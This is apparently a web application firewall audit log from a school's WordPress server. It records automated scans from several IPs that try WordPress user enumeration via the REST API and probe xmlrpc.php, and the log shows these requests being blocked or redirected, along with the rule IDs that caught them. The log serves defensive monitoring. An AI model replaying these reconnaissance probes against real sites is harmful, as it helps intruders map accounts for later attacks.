[uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494730283462 6030 (- - -) Stopwatch2: 1747494730283462 6030; combined=4722, p1=573, p2=3908, p3=44, p4=41, p5=94, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d8b1d10-Z-- --c901110b-A-- [17/May/2025:22:13:54 +0700] aCinsum4kjNN-hEbWjKb3wAAAEo 103.236.140.4 38488 103.236.140.4 8181 --c901110b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c901110b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c901110b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494834044377 2617 (- - -) Stopwatch2: 1747494834044377 2617; combined=1137, p1=376, p2=731, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c901110b-Z-- --29874a27-A-- [17/May/2025:22:14:05 +0700] aCinvem4kjNN-hEbWjKb5wAAAEc 103.236.140.4 38674 103.236.140.4 8181 --29874a27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29874a27-C-- demo.sayHello --29874a27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29874a27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494845093233 5396 (- - -) Stopwatch2: 1747494845093233 5396; combined=4021, p1=471, p2=3194, p3=33, p4=34, p5=158, sr=63, sw=131, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29874a27-Z-- --13f3d152-A-- [17/May/2025:22:14:32 +0700] aCin2BKi5m5upc8uMd4NNwAAANg 103.236.140.4 39154 103.236.140.4 8181 --13f3d152-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13f3d152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13f3d152-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494872996794 2283 (- - -) Stopwatch2: 1747494872996794 2283; combined=1066, p1=345, p2=698, p3=0, p4=0, p5=23, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f3d152-Z-- --24ca776b-A-- [17/May/2025:22:14:38 +0700] aCin3hKi5m5upc8uMd4NOgAAAMo 103.236.140.4 39258 103.236.140.4 8181 --24ca776b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --24ca776b-C-- demo.sayHello --24ca776b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --24ca776b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494878497045 5554 (- - -) Stopwatch2: 1747494878497045 5554; combined=4331, p1=578, p2=3408, p3=33, p4=34, p5=153, sr=137, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24ca776b-Z-- --b89ddd3b-A-- [17/May/2025:22:15:37 +0700] aCioGQTOsBn9MSWb6WLL6wAAAIk 103.236.140.4 40334 103.236.140.4 8181 --b89ddd3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b89ddd3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b89ddd3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494937075232 3028 (- - -) Stopwatch2: 1747494937075232 3028; combined=1460, p1=443, p2=968, p3=0, p4=0, p5=49, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b89ddd3b-Z-- --ac492757-A-- [17/May/2025:22:15:46 +0700] aCioInyxdQCiyU1ENFeZeQAAABQ 103.236.140.4 40530 103.236.140.4 8181 --ac492757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac492757-C-- demo.sayHello --ac492757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac492757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747494946193375 5302 (- - -) Stopwatch2: 1747494946193375 5302; combined=3983, p1=489, p2=3279, p3=30, p4=34, p5=90, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac492757-Z-- --31a8c61c-A-- [17/May/2025:22:16:37 +0700] aCioVXyxdQCiyU1ENFeZuQAAAAw 103.236.140.4 41382 103.236.140.4 8181 --31a8c61c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --31a8c61c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31a8c61c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747494997482987 2903 (- - -) Stopwatch2: 1747494997482987 2903; combined=1385, p1=429, p2=913, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a8c61c-Z-- --5970f565-A-- [17/May/2025:22:16:45 +0700] aCioXRKi5m5upc8uMd4NzQAAANc 103.236.140.4 41510 103.236.140.4 8181 --5970f565-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5970f565-C-- demo.sayHello --5970f565-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5970f565-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495005432694 6006 (- - -) Stopwatch2: 1747495005432694 6006; combined=4356, p1=547, p2=3569, p3=32, p4=36, p5=101, sr=75, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5970f565-Z-- --fefbc923-A-- [17/May/2025:22:21:16 +0700] aCipbHyxdQCiyU1ENFebEQAAAA0 103.236.140.4 46254 103.236.140.4 8181 --fefbc923-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fefbc923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fefbc923-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495276853658 2398 (- - -) Stopwatch2: 1747495276853658 2398; combined=1101, p1=367, p2=708, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fefbc923-Z-- --4573a510-A-- [17/May/2025:22:21:26 +0700] aCipdnyxdQCiyU1ENFebGwAAAAY 103.236.140.4 46434 103.236.140.4 8181 --4573a510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4573a510-C-- demo.sayHello --4573a510-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4573a510-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495286913281 5787 (- - -) Stopwatch2: 1747495286913281 5787; combined=4311, p1=535, p2=3552, p3=35, p4=36, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4573a510-Z-- --287f4019-A-- [17/May/2025:22:22:38 +0700] aCipvhKi5m5upc8uMd4PlgAAAMg 103.236.140.4 47698 103.236.140.4 8181 --287f4019-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --287f4019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --287f4019-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495358049803 2585 (- - -) Stopwatch2: 1747495358049803 2585; combined=1178, p1=408, p2=741, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --287f4019-Z-- --b4eb7f13-A-- [17/May/2025:22:22:45 +0700] aCipxRKi5m5upc8uMd4PsgAAAMI 103.236.140.4 47846 103.236.140.4 8181 --b4eb7f13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b4eb7f13-C-- demo.sayHello --b4eb7f13-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4eb7f13-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495365283535 16453 (- - -) Stopwatch2: 1747495365283535 16453; combined=26078, p1=538, p2=3222, p3=33, p4=34, p5=11139, sr=71, sw=62, l=0, gc=11050 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4eb7f13-Z-- --e83ce00f-A-- [17/May/2025:22:23:14 +0700] aCip4nyxdQCiyU1ENFebcQAAAAU 103.236.140.4 48338 103.236.140.4 8181 --e83ce00f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e83ce00f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e83ce00f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495394597835 2358 (- - -) Stopwatch2: 1747495394597835 2358; combined=1048, p1=344, p2=680, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e83ce00f-Z-- --a9bbcd36-A-- [17/May/2025:22:23:21 +0700] aCip6RKi5m5upc8uMd4P_QAAAMs 103.236.140.4 48458 103.236.140.4 8181 --a9bbcd36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9bbcd36-C-- demo.sayHello --a9bbcd36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9bbcd36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495401920266 5901 (- - -) Stopwatch2: 1747495401920266 5901; combined=4404, p1=529, p2=3633, p3=38, p4=36, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9bbcd36-Z-- --1bdf6778-A-- [17/May/2025:22:24:12 +0700] aCiqHHyxdQCiyU1ENFebowAAABg 103.236.140.4 49346 103.236.140.4 8181 --1bdf6778-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1bdf6778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bdf6778-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495452476287 2380 (- - -) Stopwatch2: 1747495452476287 2380; combined=1010, p1=350, p2=635, p3=0, p4=0, p5=25, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bdf6778-Z-- --4d118a52-A-- [17/May/2025:22:24:20 +0700] aCiqJBKi5m5upc8uMd4QgwAAAMU 103.236.140.4 49474 103.236.140.4 8181 --4d118a52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.8 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d118a52-C-- demo.sayHello --4d118a52-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d118a52-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495460158197 5758 (- - -) Stopwatch2: 1747495460158197 5758; combined=4262, p1=526, p2=3504, p3=36, p4=35, p5=95, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d118a52-Z-- --507c9318-A-- [17/May/2025:22:24:20 +0700] aCiqJHyxdQCiyU1ENFebrQAAABU 103.236.140.4 49484 103.236.140.4 8181 --507c9318-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --507c9318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --507c9318-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] 